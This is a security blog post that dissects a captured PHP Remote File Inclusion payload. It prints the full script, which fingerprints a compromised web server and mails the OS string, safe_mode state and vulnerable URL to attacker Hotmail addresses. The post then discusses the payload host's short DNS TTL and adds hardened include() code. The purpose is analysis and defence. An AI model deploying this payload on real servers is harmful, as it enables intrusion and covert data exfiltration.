
Wednesday, 26 October 2011

Dissecting Sample No - 12


<?php
;
//=================================
//
// scan inb0x hotmail v3.0
//
// coded by FilhOte_Ccs and LOST
// re-c0d3d by delet
//
//
//=================================
//
// Remove execution limits so the mail step below is never cut short.
ini_set("max_execution_time",-1);
set_time_limit(0);
// Fingerprint the compromised host: web-server user, OS/kernel string, safe_mode state.
$user = @get_current_user();
$UNAME = @php_uname();
$SafeMode = @ini_get('safe_mode');
// Backticks appear as in the captured copy; the intent is an empty-string comparison.
if ($SafeMode == ``) { $SafeMode = "OFF"; }
else { $SafeMode = " $SafeMode "; }
// URL of the vulnerable page, i.e. the entry point the attacker can come back to.
$delet=($_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']);
// Report body (Portuguese): "Machine = ...", "Security = ...", the URL, "Many thanks: SCOTAO".
$dados=("Maquina = " . $UNAME . "
Segurança = " . $SafeMode . "
http://" . $delet . "

Muito obrigado: SCOTAO");
$email = "paull0_tec@hotmail.com";
$assunto = "b0x";                     // mail subject
$email1 = "b4rth2012@hotmail.com";    // recipient: the attacker's drop box
// Sloppiness kept from the sample: "%lt;" is a typo for "<", and the second
// assignment overwrites the From header instead of appending to it.
$headers = "From: %lt;$email>";
$headers = "MIME-Version: 1.0";
$headers .= "Content-type: text/html; charset=iso-8859-1";
// Mail the fingerprint out. "Isso, ja foi!" = "That's it, it's sent!"; "Não foi." = "It didn't go."
if(mail($email1,$assunto,$dados,$headers)){
echo "Isso, ja foi!";
exit();
}
else{
echo "Não foi.";
exit();
}


This sample is the include file used in a Remote File Inclusion (RFI) attack delivered over FTP. The attacker
passes an ftp:// URL to a vulnerable include() on your server; PHP fetches the file over FTP and executes it in
the web server's context, and the script then mails the host's OS string, safe_mode setting and the URL of the
vulnerable page to the attacker's mailbox. The second point of interest is the DNS record of the host the
payload was fetched from:
name                 class  type  data            time to live
cmddeenvio.zxq.net   IN     A     67.220.217.230  120s (00:02:00)

Note the TTL: only two minutes. A TTL this short lets the attacker repoint the name to another address, or drop
the record entirely, and have the change take effect almost immediately once the attack is finished. After
that, resolving the host returns nothing useful to an investigator, so record the IP as early as possible when
you see a hostname like this in your logs.

By itself, a short TTL does not prove that the domain's authoritative DNS server was broken into: short TTLs are
the default on many free and dynamic DNS hosting services, and control of the zone through an ordinary hosting
account is enough to set one. What it does show is that the attacker controls the record and wants it to be
disposable.

Still, if you run an authoritative DNS server, lock it down: an attacker who can edit your zone records gets
exactly this kind of short-lived, hard-to-trace infrastructure for free.
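To make the inclusion path concrete, here is an added example (not code from the dissected sample) of the kind of include() that lets an attacker pull a payload like the one above over ftp://, beside a hardened form. The page parameter name, the pages/ directory, the allow-list entries and the ftp://cmddeenvio.zxq.net/b0x.txt path are assumptions for illustration.

```php
<?php
// Added example, not part of the original post or the dissected sample.
// Hypothetical names: $_GET['page'], the pages/ template directory and the
// allow-list below are assumptions made for illustration.

// --- Vulnerable form ---------------------------------------------------------
// With allow_url_include=On (which also needs allow_url_fopen=On), include()
// accepts stream wrappers, so a request such as
//   index.php?page=ftp://cmddeenvio.zxq.net/b0x.txt
// makes PHP download the file over FTP and run it as the web server user.
function show_page_vulnerable(string $page): void
{
    include $page;   // attacker controls the entire include path
}

// --- Hardened form -----------------------------------------------------------
// 1. Map the parameter to an allow-list of known templates instead of building
//    a path from user input.
// 2. Reject anything that is not a plain identifier (no "/", ":", "..", NUL).
// 3. Confirm the resolved path still lives inside the template directory.
// 4. Independently, set allow_url_include=Off (and ideally allow_url_fopen=Off)
//    in php.ini so remote wrappers are refused even if a check is bypassed.
const TEMPLATE_DIR  = __DIR__ . '/pages';
const ALLOWED_PAGES = ['home', 'about', 'contact'];

function resolve_template(string $page): ?string
{
    if (!in_array($page, ALLOWED_PAGES, true)) {
        return null;
    }
    if (!preg_match('/\A[a-z0-9_]+\z/', $page)) {
        return null;
    }
    $base = realpath(TEMPLATE_DIR);
    $path = realpath(TEMPLATE_DIR . '/' . $page . '.php');
    if ($base === false || $path === false) {
        return null;
    }
    // Ensure the canonical path is beneath the template directory.
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($path, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $path;
}

function show_page_hardened(string $page): void
{
    $path = resolve_template($page);
    if ($path === null) {
        http_response_code(404);
        exit('unknown page');
    }
    include $path;
}

// Deployment check: complain loudly if remote includes are still enabled.
function remote_include_enabled(): bool
{
    return filter_var(ini_get('allow_url_include'), FILTER_VALIDATE_BOOLEAN);
}

if (remote_include_enabled()) {
    error_log('allow_url_include is On: an ftp:// or http:// page parameter would be executed');
}

show_page_hardened($_GET['page'] ?? 'home');
```

The allow-list is the real control; the regular expression and the realpath() check are defence in depth against a future developer loosening the list. Turning allow_url_include off in php.ini (it is deprecated as of PHP 7.4) removes the ftp:// and http:// wrappers from include() entirely, which is what stops this particular sample from ever being fetched.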
